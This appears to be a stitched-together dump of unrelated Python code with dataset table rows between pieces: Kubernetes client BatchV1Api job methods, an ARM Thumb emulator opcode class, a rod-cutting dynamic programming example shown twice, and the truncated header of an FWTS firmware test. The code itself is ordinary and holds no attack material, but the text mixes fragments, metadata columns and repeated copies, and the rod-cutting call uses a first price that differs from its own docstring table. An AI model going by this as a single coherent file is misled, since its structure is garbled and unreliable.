def create_namespaced_job(self, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_namespaced_job_with_http_info(namespace, body, **kwargs)
return data
def create_namespaced_job_with_http_info(self, namespace, body, **kwargs):
all_params = ['namespace', 'body', 'include_uninitialized', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_namespaced_job`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_job(self, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_collection_namespaced_job_with_http_info(namespace, **kwargs)
return data
def delete_collection_namespaced_job_with_http_info(self, namespace, **kwargs):
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_job(self, name, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.delete_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def delete_namespaced_job_with_http_info(self, name, namespace, **kwargs):
all_params = ['name', 'namespace', 'pretty', 'body', 'dry_run', 'grace_period_seconds', 'orphan_dependents', 'propagation_policy']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
if 'grace_period_seconds' in params:
query_params.append(('gracePeriodSeconds', params['grace_period_seconds']))
if 'orphan_dependents' in params:
query_params.append(('orphanDependents', params['orphan_dependents']))
if 'propagation_policy' in params:
query_params.append(('propagationPolicy', params['propagation_policy']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Status',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_api_resources(self, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_api_resources_with_http_info(**kwargs)
return data
def get_api_resources_with_http_info(self, **kwargs):
all_params = []
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1APIResourceList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_job_for_all_namespaces(self, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_job_for_all_namespaces_with_http_info(**kwargs)
else:
(data) = self.list_job_for_all_namespaces_with_http_info(**kwargs)
return data
def list_job_for_all_namespaces_with_http_info(self, **kwargs):
all_params = ['_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_job_for_all_namespaces" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_namespaced_job(self, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_namespaced_job_with_http_info(namespace, **kwargs)
else:
(data) = self.list_namespaced_job_with_http_info(namespace, **kwargs)
return data
def list_namespaced_job_with_http_info(self, namespace, **kwargs):
all_params = ['namespace', 'include_uninitialized', 'pretty', '_continue', 'field_selector', 'label_selector', 'limit', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `list_namespaced_job`")
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized']))
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if '_continue' in params:
query_params.append(('continue', params['_continue']))
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector']))
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector']))
if 'limit' in params:
query_params.append(('limit', params['limit']))
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version']))
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds']))
if 'watch' in params:
query_params.append(('watch', params['watch']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1JobList',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def patch_namespaced_job_status(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.patch_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def patch_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_namespaced_job_status`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `patch_namespaced_job_status`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job(self, name, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_with_http_info(self, name, namespace, **kwargs):
all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'exact' in params:
query_params.append(('exact', params['exact']))
if 'export' in params:
query_params.append(('export', params['export']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def read_namespaced_job_status(self, name, namespace, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_namespaced_job_status_with_http_info(name, namespace, **kwargs)
return data
def read_namespaced_job_status_with_http_info(self, name, namespace, **kwargs):
all_params = ['name', 'namespace', 'pretty']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_namespaced_job_status`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_job_status(self, name, namespace, body, **kwargs):
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_namespaced_job_status_with_http_info(name, namespace, body, **kwargs)
return data
def replace_namespaced_job_status_with_http_info(self, name, namespace, body, **kwargs):
all_params = ['name', 'namespace', 'body', 'pretty', 'dry_run']
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_job_status" % key
)
params[key] = val
del params['kwargs']
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_namespaced_job_status`")
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_namespaced_job_status`")
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_namespaced_job_status`")
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = []
if 'pretty' in params:
query_params.append(('pretty', params['pretty']))
if 'dry_run' in params:
query_params.append(('dryRun', params['dry_run']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
auth_settings = ['BearerToken']
return self.api_client.call_api('/apis/batch/v1/namespaces/{namespace}/jobs/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1Job',
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| true | true |
79011ddbdaf445056b62825e0177f0699d9bc6ab | 670 | py | Python | armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_16_bit/thumb_shift_immediate_add_subtract_move_and_compare/mov_register_thumb_t2.py | matan1008/armulator | 04d24dcec6ab42326018f5e09331e5b4738d6b52 | [
"MIT"
] | 16 | 2018-01-22T14:36:49.000Z | 2021-12-17T15:39:52.000Z | armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_16_bit/thumb_shift_immediate_add_subtract_move_and_compare/mov_register_thumb_t2.py | AhmedMounir/armulator | 04d24dcec6ab42326018f5e09331e5b4738d6b52 | [
"MIT"
] | 3 | 2019-02-19T17:51:47.000Z | 2022-03-31T20:45:21.000Z | armulator/armv6/opcodes/thumb_instruction_set/thumb_instruction_set_encoding_16_bit/thumb_shift_immediate_add_subtract_move_and_compare/mov_register_thumb_t2.py | AhmedMounir/armulator | 04d24dcec6ab42326018f5e09331e5b4738d6b52 | [
"MIT"
] | 4 | 2020-06-18T23:51:03.000Z | 2022-02-09T17:43:13.000Z | from armulator.armv6.opcodes.abstract_opcodes.mov_register_thumb import MovRegisterThumb
from armulator.armv6.opcodes.opcode import Opcode
class MovRegisterThumbT2(MovRegisterThumb, Opcode):
def __init__(self, instruction, m, d):
Opcode.__init__(self, instruction)
MovRegisterThumb.__init__(self, True, m, d)
def is_pc_changing_opcode(self):
return self.d == 15
@staticmethod
def from_bitarray(instr, processor):
rd = instr[13:16]
rm = instr[10:13]
if processor.in_it_block():
print "unpredictable"
else:
return MovRegisterThumbT2(instr, **{"m": rm.uint, "d": rd.uint})
| 31.904762 | 88 | 0.674627 | from armulator.armv6.opcodes.abstract_opcodes.mov_register_thumb import MovRegisterThumb
from armulator.armv6.opcodes.opcode import Opcode
class MovRegisterThumbT2(MovRegisterThumb, Opcode):
def __init__(self, instruction, m, d):
Opcode.__init__(self, instruction)
MovRegisterThumb.__init__(self, True, m, d)
def is_pc_changing_opcode(self):
return self.d == 15
@staticmethod
def from_bitarray(instr, processor):
rd = instr[13:16]
rm = instr[10:13]
if processor.in_it_block():
print "unpredictable"
else:
return MovRegisterThumbT2(instr, **{"m": rm.uint, "d": rd.uint})
| false | true |
79011fb2cfd25f3f0f3e4a25c5718c2f3a077f8a | 1,126 | py | Python | DynamicProgramming/UnBoundedKnapSack/RodCutting.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 12 | 2021-06-18T16:24:27.000Z | 2021-11-04T03:30:00.000Z | DynamicProgramming/UnBoundedKnapSack/RodCutting.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 32 | 2021-10-01T07:15:00.000Z | 2021-11-05T15:35:53.000Z | DynamicProgramming/UnBoundedKnapSack/RodCutting.py | Saicharan67/Interview-Coding-Questions | b28cccd41e380f15b833039d687931570908adfb | [
"MIT"
] | 21 | 2021-09-29T09:16:31.000Z | 2021-10-30T10:06:21.000Z | """
Given a rod of length n inches and an array of prices
that includes prices of all pieces of size smaller than n.
Determine the maximum value obtainable by cutting up the rod and
selling the pieces. For example, if the length of the rod is 8
and the values of different pieces are given as the following,
then the maximum obtainable value is 22 (by cutting in two pieces of lengths 2 and 6)
length | 1 2 3 4 5 6 7 8
--------------------------------------------
price | 1 5 8 9 10 17 17 20
In unbounded knapsack their is only one change compared to 0/1 knapsack i.e
****dp[i][j-wt[n-1]]****
wt arr => len arr
val arr => price arr
W => L
"""
def RodCutting(larr, parr, L):
n = len(larr)
dp = [[0 for j in range(L+1)]for i in range(n+1)]
for i in range(1, n+1):
for j in range(1, L+1):
if larr[i-1] <= j:
dp[i][j] = max(parr[i-1]+dp[i][j-larr[i-1]], dp[i-1][j])
else:
dp[i][j] = dp[i-1][j]
print(dp)
return dp[n][L]
print(RodCutting([1, 2, 3, 4, 5, 6, 7, 8], [9, 5, 8, 9, 10, 17, 17, 20], 8))
| 27.463415 | 86 | 0.55595 |
def RodCutting(larr, parr, L):
n = len(larr)
dp = [[0 for j in range(L+1)]for i in range(n+1)]
for i in range(1, n+1):
for j in range(1, L+1):
if larr[i-1] <= j:
dp[i][j] = max(parr[i-1]+dp[i][j-larr[i-1]], dp[i-1][j])
else:
dp[i][j] = dp[i-1][j]
print(dp)
return dp[n][L]
print(RodCutting([1, 2, 3, 4, 5, 6, 7, 8], [9, 5, 8, 9, 10, 17, 17, 20], 8))
| true | true |
7901200b85e3ad1e3f075a40d541414a1b210b81 | 10,122 | py | Python | testcases/FWTS.py | jk-ozlabs/op-test-framework | 363165fa274f86243e7b924918bebf2325a7a8b2 | [
"Apache-2.0"
] | null | null | null | testcases/FWTS.py | jk-ozlabs/op-test-framework | 363165fa274f86243e7b924918bebf2325a7a8b2 | [
"Apache-2.0"
] | null | null | null | testcases/FWTS.py | jk-ozlabs/op-test-framework | 363165fa274f86243e7b924918bebf2325a7a8b2 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python2
# OpenPOWER Automated Test Project
#
# Contributors Listed Below - COPYRIGHT 2015,2017
# [+] International Business Machines Corp.
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
# This test runs FWTS and munges the JSON report output into
# python unittest.TestCase objects, so we get the individual
# failure/successes into the TestResult output (e.g. junit XML)
import time
import subprocess
import re
import sys
import os
import OpTestConfiguration
import unittest
from common.OpTestSystem import OpSystemState
from common.Exceptions import CommandFailed
import json
class FWTSCommandFailed(unittest.TestCase):
FAIL = None
